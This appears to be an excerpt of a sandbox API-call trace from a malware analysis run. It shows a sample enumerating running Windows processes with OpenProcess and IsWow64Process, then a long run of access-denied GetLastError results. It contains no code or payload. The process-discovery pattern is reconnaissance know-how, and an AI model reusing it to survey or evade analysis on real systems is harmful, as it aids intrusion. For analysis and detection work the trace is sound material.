	[0096.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ae08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fea8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.412] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.412] CloseHandle (hObject=0x248) returned 1
	[0096.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x6590e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.413] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.413] CloseHandle (hObject=0x248) returned 1
	[0096.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.414] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.414] CloseHandle (hObject=0x248) returned 1
	[0096.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.414] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.414] CloseHandle (hObject=0x248) returned 1
	[0096.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.414] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.414] CloseHandle (hObject=0x248) returned 1
	[0096.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.415] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.415] CloseHandle (hObject=0x248) returned 1
	[0096.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658f88, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.415] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.415] CloseHandle (hObject=0x248) returned 1
	[0096.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.415] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.415] CloseHandle (hObject=0x248) returned 1
	[0096.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.416] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.416] CloseHandle (hObject=0x248) returned 1
	[0096.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.416] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.416] CloseHandle (hObject=0x248) returned 1
	[0096.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.416] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.416] CloseHandle (hObject=0x248) returned 1
	[0096.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.417] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.417] CloseHandle (hObject=0x248) returned 1
	[0096.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658d28, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.417] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.417] CloseHandle (hObject=0x248) returned 1
	[0096.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ad18, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.417] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.417] CloseHandle (hObject=0x248) returned 1
	[0096.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658d28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.418] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.418] CloseHandle (hObject=0x248) returned 1
	[0096.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.418] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.418] CloseHandle (hObject=0x248) returned 1
	[0096.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658f08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.418] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.418] CloseHandle (hObject=0x248) returned 1
	[0096.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.419] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.419] CloseHandle (hObject=0x248) returned 1
	[0096.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.419] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.419] CloseHandle (hObject=0x248) returned 1
	[0096.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x6590c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.419] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.419] CloseHandle (hObject=0x248) returned 1
	[0096.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658f28, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.419] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.419] CloseHandle (hObject=0x248) returned 1
	[0096.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.420] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.420] CloseHandle (hObject=0x248) returned 1
	[0096.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.420] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.420] CloseHandle (hObject=0x248) returned 1
	[0096.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x6589e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0096.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.420] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.420] CloseHandle (hObject=0x248) returned 1
	[0096.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.421] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.421] CloseHandle (hObject=0x248) returned 1
	[0096.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.421] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.421] CloseHandle (hObject=0x248) returned 1
	[0096.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658d68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.421] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.421] CloseHandle (hObject=0x248) returned 1
	[0096.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.422] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.422] CloseHandle (hObject=0x248) returned 1
	[0096.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x6590a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.422] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.422] CloseHandle (hObject=0x248) returned 1
	[0096.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0096.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.422] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.422] CloseHandle (hObject=0x248) returned 1
	[0096.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658970, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0096.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.423] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.423] CloseHandle (hObject=0x248) returned 1
	[0096.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fe90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.423] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetLastError () returned 0x5
	[0096.424] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.424] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.425] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
	[0096.425] GetLastError () returned 0x5
